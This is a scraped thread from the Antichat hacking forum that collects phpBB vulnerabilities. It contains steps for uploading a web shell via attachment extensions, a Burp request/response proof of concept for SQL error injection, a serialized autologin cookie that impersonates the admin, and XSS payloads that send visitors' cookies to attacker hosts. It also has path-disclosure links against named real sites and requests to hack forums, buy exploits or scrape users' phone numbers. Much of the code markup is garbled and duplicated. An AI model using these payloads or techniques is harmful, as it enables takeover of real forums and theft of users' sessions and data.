ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости CMS / форумов (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   [Обзор уязвимостей phpBB] (https://forum.antichat.xyz/showthread.php?t=24488)

MrCepbIu 25.09.2012 11:57

не подкинете ни чего на 3.0.2?

Unknown 08.10.2012 16:09

Заливка шелла

phpBB2 Plus by phpMiX

Идем в админпанель+ расширения + управление + добавляем расширение php (группа archives)

Идем на форум.

Создаем тему + прикрепить файл + прикрепляем шел.

После нажатия кнопки "Прикрепить файл" в разделе "Прикрепленные файлы" появится наш шелл. Просто нажимаем на него и он открывается в новой вкладке.

DasTem 30.10.2012 19:03

для 3.0.8 есть что-то?

DyukiN 31.10.2012 12:10

как можно залить шелл,если через шаблоны не получается,выходит sql ошибка

BigBear 01.11.2012 08:24

Цитата:

Сообщение от DyukiN
как можно залить шелл,если через шаблоны не получается,выходит sql ошибка

какая именно ?

phenix1025 09.11.2012 19:11

phpbb 3

Подскажите, пожалуйста, есть ли что на phpbb v3 RC-5 ? Вроде версия выпущена довольно давно, но живого ничего на нее найти не могу

BigBear 12.11.2012 12:53

Цитата:

Сообщение от OxoTnik


Тип: phpBB3 SQL Injection

Версия: phpbb 3.0.11 (последняя версия на сегодня)

Exploit: examle.com/ucp.php

Иньекция в POST запросе

Параметр: User-Agent


Автор: OxoTnik

Приложи PoC пожалуйста и уязвимый код.

Народ недопонимает о чём речь.

Pirotexnik 12.11.2012 13:24

Цитата:

Сообщение от OxoTnik


Тип: phpBB3 SQL Injection

Версия: phpbb 3.0.11 (последняя версия на сегодня)

Exploit: examle.com/ucp.php

Иньекция в POST запросе

Параметр: User-Agent


Автор: OxoTnik

Пробовал на 3.0.9 - при смене User-Agent - вылетает сессия. И все. Можно код?

Pirotexnik 12.11.2012 14:19

[B]phpBB [/COLOR]get_filename($row['lang_iso'],$this->language_directory,$this->language_file,true,true);

$fp= @fopen($phpbb_root_path.$filename,'wb');

if (!
$fp)

{

trigger_error(sprintf($user->lang['UNABLE_TO_WRITE_FILE'],$filename) .adm_back_link($this->u_action.'&id='.$lang_id.'&action=details&language_file='.urlencode($selected_lang_file)),E_USER_WARNING);

}

if (
$this->language_directory=='email')

{

// Email Template

$entry=$this->prepare_lang_entry($_POST['entry'],false);

fwrite($fp,$entry);

}
[/COLOR]
[/PHP]
$entry = $this->prepare_lang_entry($_POST['entry'], false);

fwrite($fp, $entry);

Подтолкните в верном направление

BigBear 15.11.2012 08:20

Цитата:

Сообщение от OxoTnik
Ещё одна бага
Итак уязвимость.
Тестил на
3.0.9
и на
3.0.11
не проверял на версиях ниже 3.0.9

SQL
Бежим в
настройки форума
, вкладка
Настройки отображения
, нажимаем
Отправить
(Снифером ловим запрос)
Exploit
http://examle.com/
ucp.php?i=prefs&mode=view
POST inject parametr:
post_st
скуля в update, если что, можно сменить пароль.
Автор OxoTnik
Antichat.ru​

Чувствую себя попугаем. (Птицей, а не форумчанином =) )

(Попугаю кстати отдельный привет =))



Приложите наконец-то уязвимый код и PoC раз постите такие уязвимости.

KolosJey 15.11.2012 13:51

BigBear ты модератор раздела, ну проверь её сам, что ты просишь код у человека который пишет бред?

Вот запрос о котором он тут пишет:

includes/ucp/ucp_prefs.php

PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#DD0000"]'post_st'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]request_var[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'post_st'[/COLOR][COLOR="#007700"], (!empty([/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_post_show_days'[/COLOR][COLOR="#007700"]])) ?[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_post_show_days'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]),

...

[/
COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'UPDATE '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]USERS_TABLE[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'

SET '
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]sql_build_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'UPDATE'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$sql_ary[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]'

WHERE user_id = '
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_id'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]sql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);

[/
COLOR][/COLOR

includes/functions.php

PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]request_var[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$var_name[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$default[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$multibyte[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$cookie[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"])

...

if (![/COLOR][COLOR="#0000BB"]is_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$default[/COLOR][COLOR="#007700"]))

{

[/
COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]gettype[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$default[/COLOR][COLOR="#007700"]);

}

[/
COLOR][/COLOR

тип переменной определяется из $user->data, который выбирается из phpbb_users, а там в свою очередь стоит:

Код:

user_post_show_days        smallint(4)                UNSIGNED
какая на*** скуля, накачали акунетиксов и стали хакерами.

BaleHoK 15.11.2012 15:22

Цитата:

Сообщение от OxoTnik
Ещё одна бага
Итак уязвимость.
Тестил на
3.0.9
и на
3.0.11
не проверял на версиях ниже 3.0.9

SQL
Бежим в
настройки форума
, вкладка
Настройки отображения
, нажимаем
Отправить
(Снифером ловим запрос)
Exploit
http://examle.com/
ucp.php?i=prefs&mode=view
POST inject parametr:
post_st
скуля в update, если что, можно сменить пароль.
Автор OxoTnik
Antichat.ru​

Он просто не правильно выразился (мб просто знаний не хватает в данной области), там не sql inj а просто sql error,так же эррор валится и в topic_st=-1

Но еще раз повторю,не скул это,просто эрроры

CoBecTb 17.11.2012 00:22

Цитата:

Сообщение от OxoTnik
Ещё одна бага
Итак уязвимость.
Тестил на
3.0.9
и на
3.0.11
не проверял на версиях ниже 3.0.9

SQL
Бежим в
настройки форума
, вкладка
Настройки отображения
, нажимаем
Отправить
(Снифером ловим запрос)
Exploit
http://examle.com/
ucp.php?i=prefs&mode=view
POST inject parametr:
post_st
скуля в update, если что, можно сменить пароль.
Автор OxoTnik
Antichat.ru​

Посоветуйте хороший снифер, и ещё вопрос, смогу ли я таким образом угнать админку? Заранее благодарю.

Pirotexnik 17.11.2012 20:09

2CoBecTb Fiddler. Нет.

Dr..VATSON 14.01.2013 22:27

На 3.0.10 есть чего?

FeoGrad 05.03.2013 21:45

Постоянно лезет массовый спам на форум (v. 3.0.11)

То же началось ещё в весрии 3.0.9

Обновил до v. 3.0.11 - всё тоже

Сбэкапил БД уже обновлённого форума, снёс его полностью и поставил всё с самого нуля. Восстановил на полностью новом форуме старую БД. Ничего не дало - спамеры лезут.

Вопрос/ответ - не помагает. ReCaptcha так же...

Что можно сделать. Я не хакер, а просто вебмастер. Кто может помочь?

ukrpunk 06.03.2013 19:24

Цитата:

Сообщение от FeoGrad
Постоянно лезет массовый спам на форум (v. 3.0.11)
То же началось ещё в весрии 3.0.9
Обновил до v. 3.0.11 - всё тоже
Сбэкапил БД уже обновлённого форума, снёс его полностью и поставил всё с самого нуля. Восстановил на полностью новом форуме старую БД. Ничего не дало - спамеры лезут.
Вопрос/ответ - не помагает. ReCaptcha так же...
Что можно сделать. Я не хакер, а просто вебмастер. Кто может помочь?

сделай при регистрации чтобы кроме капчи вопрос был, только вопрос сам придумай чтобы его в базе хрумера не было

FeoGrad 11.03.2013 01:50

Я же писал, что вопрос-ответ уже пробовал. Одинаково спам идёт. Вопросы делал свои и неплохие...

BigBear 20.05.2013 15:04

Цитата:

Сообщение от neomag06
Требуется из форума phpBB вытянуть все мобильные номера телефонов, которые находятся в подписях пользователей. Посоветуйте как это можно сделать?
Заранее Благодарю!

Заказать парсер профилей на заказ, либо при наличии доступа к БД вытягивать нужную колонку из таблицы с пользователями.

Всю спарсенную информацию пропускать через регулярные выражения.

neomag06 20.05.2013 15:20

BigBear, Спасибо большое за ответ!

Доступ к форуму только пользовательский, соответственно залезть в БД не могу, поэтому этот вариант не подходит.

А вот на заказ заказать - это выход. Я видел на этом форуме несколько таких предложений, но их авторы не отзываются, а их почты не работают...

Может подскажете к кому обратиться или какую программу использовать для моей цели.

Спасибо.

BigBear 20.05.2013 15:26

Цитата:

Сообщение от neomag06
BigBear
, Спасибо большое за ответ!
Доступ к форуму только пользовательский, соответственно залезть в БД не могу, поэтому этот вариант не подходит.
А вот на заказ заказать - это выход. Я видел на этом форуме несколько таких предложений, но их авторы не отзываются, а их почты не работают...
Может подскажете к кому обратиться или какую программу использовать для моей цели.
Спасибо.

Попробуйте написать тему здесь. Не забудьте про сумму оплаты.

Ну и если хотите получить свой продукт в целостности и сохранности - советую пользоваться сервисом Гарантов Античата.

AnnaKill 12.08.2013 16:12

Цитата:

Сообщение от FeoGrad
Постоянно лезет массовый спам на форум (v. 3.0.11)
...
Вопрос/ответ - не помагает. ReCaptcha так же...
Что можно сделать. Я не хакер, а просто вебмастер. Кто может помочь?

Вот ваше спасение: http://www.phpbb.com/customise/db/mod/sortables_captcha_plugin/

Спамеры всё-равно могут пройти, но уже только ручками. Робот такого не умеет. Проверено!

KSIVIT 02.10.2013 00:53

Уважаемые, помогите пожалуйста с эксплуатированием этого эксплойта.

------------------------------------------------------------------

Name : phpBB3 SQL Injection

------------------------------------------------------------------

Date : 27.07.2012

------------------------------------------------------------------

Site : www.phpbb.com

------------------------------------------------------------------

Version : 3.0.10

------------------------------------------------------------------

1) What is it?

This is very nice forum board. You should try it!

------------------------------------------------------------------

2) Type of bug?

SQL Injection (or SQL-info-Leak if You want).

------------------------------------------------------------------

3) Where is the bug?

Vulnerable parameter seems to be 'style' because if we set up this parameter

to 'bigger number' (for example: 111111111) we will get an error, with full SQL

statement.

*updated - dateformat is the second vulnerable parameter!

*updated - post_st is the 3rd vulnerable parameter!

*updated - another one: topic_st

4) PoC traffic from Burp:

4.1) Request :

---

POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&mode=personal HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip, deflate

Proxy-Connection: keep-alive

Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174

Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid=

Content-Type: application/x-www-form-urlencoded

Content-Length: 258

Connection: close

viewemail=1

&massemail=1

&allowpm=1

&hideonline=0

&notifypm=1

&popuppm=0

&lang=en

&style=%2b1111111111

&tz=0

&dst=0

&dateoptions=D+M+d%2C+Y+g%3Ai+a

&dateformat=D+M+d%2C+Y+g%3Ai+a

&submit=Submit

&creation_time=1343370877

&form_token=576...

---

4.2) Response:

---

HTTP/1.1 503 Service Unavailable

Date: Fri, 27 Jul 2012 06:39:06 GMT

Server: Apache/2.2.22 (Ubuntu)

X-Powered-By: PHP/5.3.10-1ubuntu3.2

Vary: Accept-Encoding

Connection: close

Content-Type: text/html

Content-Length: 2889

Return to the index page

General Error

SQL ERROR [ mysqli ]

Out of range value for column 'user_style' at row 1 [1264]

SQL

UPDATE phpbb_users

SET user_allow_pm = 1, user_allow_viewemail = 1, user_allow_massemail = 1, user_allow_viewonline = 1,

user_notify_type = '0', user_notify_pm = 1, user_options = '230271', user_dst = 0,

user_dateformat = 'D M d, Y g:i a', user_lang = 'en', user_timezone = 0, user_style = 1111111111

WHERE user_id = 2

BACKTRACE

FILE: [ROOT]/includes/db/mysqli.php

LINE: 182

CALL: dbal->sql_error()

FILE: [ROOT]/includes/ucp/ucp_prefs.php

LINE: 100

CALL: dbal_mysqli->sql_query()

FILE: [ROOT]/includes/functions_module.php

LINE: 507

CALL: ucp_prefs->main()

FILE: [ROOT]/ucp.php

LINE: 333

CALL: p_master->load_active()

Please notify the board administrator or webmaster: (...)

---

4.2 Other response (this time from post_st parameter):

---





Return to the index page



General Error

SQL ERROR [ mysqli ]

Incorrect integer value: 'javascript:alert(123123);/' for column 'user_post_show_days' at row 1 [1366]

An SQL error occurred while fetching this page.

Please contact the

EoGeneo 23.10.2013 22:51

ага, тоже от сплойта выше, как его юзать)

qaz 23.10.2013 23:21

Цитата:

Сообщение от KSIVIT
Уважаемые, помогите пожалуйста с эксплуатированием этого эксплойта.

Цитата:

Сообщение от EoGeneo
ага, тоже от сплойта выше, как его юзать)

это не експлоит а пример уязвимости, толку от нё кроме вызова ошибки - никакого, заходишь на форум - авторизируешся, заходишь в настройки пррофиля и правишь параметры в заголовках которые указаны в примере

Kamik 12.03.2014 06:15

Цитата:

Сообщение от qaz
это не експлоит а пример уязвимости, толку от нё кроме вызова ошибки - никакого, заходишь на форум - авторизируешся, заходишь в настройки пррофиля и правишь параметры в заголовках которые указаны в примере

Попробовал проексплуатировать - не получилось. Могу дать ссыль рабочий на сайт с этой "уязвимостью" и учету для тестов.

А вообще ктонить разобрался как её правильно юзать?

CleafJenkins 02.10.2015 20:15

Перепробывал все что есть на первой и второй странице топика. Ничего не помогло

Цель - просто прочесть закрытые страницы, темы форума. Имеется форум на phpBB 3.0 Olympus хостинг 2х2

Комьюнити можете пожайлуста помочь, подсказать? А то я в вебе совсем не бум-бум

Vip77 16.01.2016 18:20

Full path disclosure:

/privmsg.php?mode=%0A

Poc:

Код:

http://lodjiya.ru/forum/privmsg.php?mode=%0A
http://elremont.ru/forum/privmsg.php?mode=%0A


CleafJenkins 18.02.2016 16:01

Цитата:

Сообщение от Vip77

Full path disclosure:
/privmsg.php?mode=%0A
Poc:
Код:

http://lodjiya.ru/forum/privmsg.php?mode=%0A
http://elremont.ru/forum/privmsg.php?mode=%0A


Что с этим делать?

andry_flog 20.12.2016 12:53

Кто разберется с форумом phpBB?(предположительно 3.1.8)

Нужна помощь с получением доступа

dragondragon 07.01.2017 21:24

под

3.0.14 phpbb

нет ни у кого уязвимости, могу купить, в лс

r00t_hack 01.07.2017 13:14

thanks

ex'pert 03.07.2017 17:25

Цитата:

Сообщение от dragondragon

под
3.0.14 phpbb
нет ни у кого уязвимости, могу купить, в лс

Присоединяюсь. Если что стучите в ЛС. Версия такая же интересует форума

Katrin58 25.10.2017 19:08

[QUOTE="qBiN"]

Рассмотрим каждую версию форума по порядку и проанализируем. Будем рассматривать с версии
2.0.4
, т.к. версии младше, обсуждать нет смысла.
[B]phpBB [/COLOR]
"
Где

- ip сервера (ip сервера можно узнать так Пуск->Выполнить-> набрать cmd, затем в появивешмся окне набрать "
ping test.com
"),

- папка где находится сам форум (например если у нас
http://123.123.123.123/forum/index.php
, вместо

пишем forum),

- ID пользователя.
Video:
http://video.antichat.net/videos/kez/phpbb_206_sql2.rar
[B]phpBB Advanced->Cookies[/I]
),
вместо X - наш ID ,
а меняем на 2 - как уже говорилось выше, ID админа
Exploit: "
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
"
Video: -
[B]phpBB [/COLOR]
"
Где

URL сайта

- директория

- нужный нам пользователь
Video: -
[B]phpBB \r\n"
Где

- ip сервера,

- директория в которой находится форум

номер существующего топика.
Video: -
[B]phpBB "
Где - ссылка до форума например
http://site.com/phpBB/
, - нужная команда (о командах читаем тут
/threadnav7345-1-10.html
).
Video: -
[B]phpbb " onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)" X=" H A L L O
[/CODE]
Код:

" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=null`style='font-size:0; X="'
PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.[url=http://wj.com/style=display:none;background:url(javascript:alert()) ]wj[/url][/url][/COLOR][/COLOR] 

[B]phpBB ' onmouseover='alert(document.location="/"+document.cookie)' X=' antichat.ru
[/CODE]
PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.[email=http://wj.com/style=display:none;background:url(javascript:alert()) ]wj[/url][/email][/COLOR][/COLOR] 

[B]phpbb [/COLOR]
"
Где

- ip сервера (ip сервера можно узнать так Пуск->Выполнить-> набрать cmd, затем в появивешмся окне набрать "
ping test.com
"),

- папка где находится сам форум (например если у нас
http://123.123.123.123/forum/index.php
, вместо

пишем forum),

- ID пользователя.
Video:
http://video.antichat.net/videos/kez/phpbb_206_sql2.rar
[B]phpBB Advanced->Cookies[/I]
),
вместо X - наш ID ,
а меняем на 2 - как уже говорилось выше, ID админа
Exploit: "
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
"
Video: -
[B]phpBB [/COLOR]
"
Где

URL сайта

- директория

- нужный нам пользователь
Video: -
[B]phpBB \r\n"
Где

- ip сервера,

- директория в которой находится форум

номер существующего топика.
Video: -
[B]phpBB "
Где - ссылка до форума например
http://site.com/phpBB/
, - нужная команда (о командах читаем тут
/threadnav7345-1-10.html
).
Video: -
[B]phpbb " onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)" X=" H A L L O
[/CODE]
Код:

" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=null`style='font-size:0; X="'
PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.[url=http://wj.com/style=display:none;background:url(javascript:alert()) ]wj[/url][/url][/COLOR][/COLOR] 

[B]phpBB ' onmouseover='alert(document.location="/"+document.cookie)' X=' antichat.ru
[/CODE]
PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.[email=http://wj.com/style=display:none;background:url(javascript:alert()) ]wj[/url][/email][/COLOR][/COLOR] 

[B]phpbb

kacergei 06.08.2022 10:23

Добрый какие есть варианты залиться на php 3.0.2.0 (PHP 5.4.45)

шаблоны недоступны (ничего заливать не дает в плане стилей - из бд беруться)

Права администратора

Из модулей:

Код:

phpbb/viglink (1.0.0)
phpbbmodders/banhammer (1.0.0)
cleantalk/antispam (4.7)

Пробовал phar но что то не получилось (не особо понял как он работает((

При попытке выполнить: https://www.exploit-db.com/exploits/46512

Ругается на ....[1]

http://dl4.joxi.net/drive/2022/08/06...b752fdc7ca.png

crlf 07.08.2022 16:12

Цитата:

Сообщение от kacergei

При попытке выполнить:
https://www.exploit-db.com/exploits/46512

Вот здесь вкратце описывал, что нужно делать. Судя по ошибке на скрине, скрипт эксплоита не может выдрать соль из ответа. Возможно от версии к версии пляшет вёрстка или нейминг, либо WAF блочит запрос. Лучшим вариантом будет установить эту верисю двига локально и воспроизвести все действия вручную и потом отдебажить эксплоит.


Время: 01:30